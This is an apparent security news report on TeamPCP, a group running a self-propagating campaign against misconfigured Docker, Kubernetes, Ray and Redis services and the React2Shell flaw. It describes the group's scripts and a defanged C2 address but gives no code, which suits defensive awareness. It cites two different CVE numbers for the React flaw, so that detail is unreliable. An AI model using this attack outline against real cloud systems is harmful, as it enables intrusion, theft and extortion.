Cybersecurity experts have identified a significant campaign that has been strategically launched against cloud-native environments, aiming to establish malicious infrastructure for further exploitation. This activity, observed around December 25, 2025, has been characterized as “worm-driven.” Attackers exploited exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, while also leveraging a recently disclosed critical vulnerability known as React2Shell (CVE-2025-55182, CVSS score: 10.0).
The campaign has been attributed to a threat group named TeamPCP, also known by aliases such as DeadCatx3, PCPcat, PersyPCP, and ShellForce. Active since at least November 2025, TeamPCP’s earliest Telegram activity dates back to July 30, 2025, with their channel currently boasting over 700 members. The group is known to publish stolen data from a variety of victims across countries such as Canada, Serbia, South Korea, the United Arab Emirates, and the United States. The threat actor’s activities were initially documented by Beelzebub in December 2025 under the operational name, Operation PCPcat.
According to Flare security researcher Assaf Morag, the goals of this operation include the creation of a large-scale distributed proxy and scanning infrastructure, along with the targeting of servers for data exfiltration, the deployment of ransomware, extortion, and cryptocurrency mining. The infrastructure exploited by TeamPCP functions as a cloud-native cybercrime platform, taking advantage of misconfigured services as the primary attack vectors to compromise modern cloud infrastructures.
The compromised infrastructure has been misused for a variety of purposes, including cryptocurrency mining, data hosting, and functioning as proxy and command-and-control (C2) relays. TeamPCP relies on conventional attack strategies that utilize widely known vulnerabilities and prevalent misconfigurations to automate their exploitation processes. This approach enables the group to create a “self-propagating criminal ecosystem,” as noted by Flare.
Successful exploitation of systems allows attackers to deploy subsequent payloads from external servers. These payloads include shell- and Python-based scripts designed to identify new targets for further expansion. A significant component of their toolkit is “proxy.sh,” which facilitates proxying, peer-to-peer (P2P) networking, and tunneling utilities, while continuously scanning for additional vulnerabilities across the internet.
Importantly, “proxy.sh” conducts environment fingerprinting during its execution to determine if it is operating within a Kubernetes cluster. If such an environment is identified, it follows a tailored execution path to drop a cluster-specific secondary payload, highlighting TeamPCP’s reliance on specialized tools and tactics designed for cloud-native targets.
The exploitation technique further involves payloads like “scanner.py,” which detects misconfigured Docker APIs and Ray dashboards. The script retrieves CIDR lists from a GitHub account named “DeadCatx3,” and includes options for running cryptocurrency miners. Other scripts, such as “kube.py” and “react.py,” focus on Kubernetes-specific functionalities and exploiting the React vulnerability (CVE-2025-29927) for broader control over compromised systems.
The command and control server identified at 67.217.57[.]240 has also been associated with the operation of Sliver, an open-source C2 framework known to be misused by cybercriminals for post-exploitation activities. The targeted victims primarily include organizations running Amazon Web Services (AWS) and Microsoft Azure infrastructures. Attacks appear to be opportunistic, primarily exploiting infrastructure vulnerabilities rather than targeting specific sectors, rendering many organizations collateral victims.
Morag stated that the PCPcat campaign illustrates a complete lifecycle of scanning, exploitation, persistence, tunneling, data theft, and monetization, specifically tailored for modern cloud infrastructures. TeamPCP stands out not due to technical novelty, but through the operational integration and scale of their attacks. A deeper analysis suggests that the majority of their exploits rely on well-known vulnerabilities and slightly modified open-source tools.
This dual approach—combining infrastructure exploitation with data theft and extortion—creates a perplexing landscape. TeamPCP leverages leaked databases and identity records to facilitate ransomware, fraud, and establish a reputation for their cybercrime endeavors, thus diversifying their revenue streams and enhancing resilience against potential takedowns.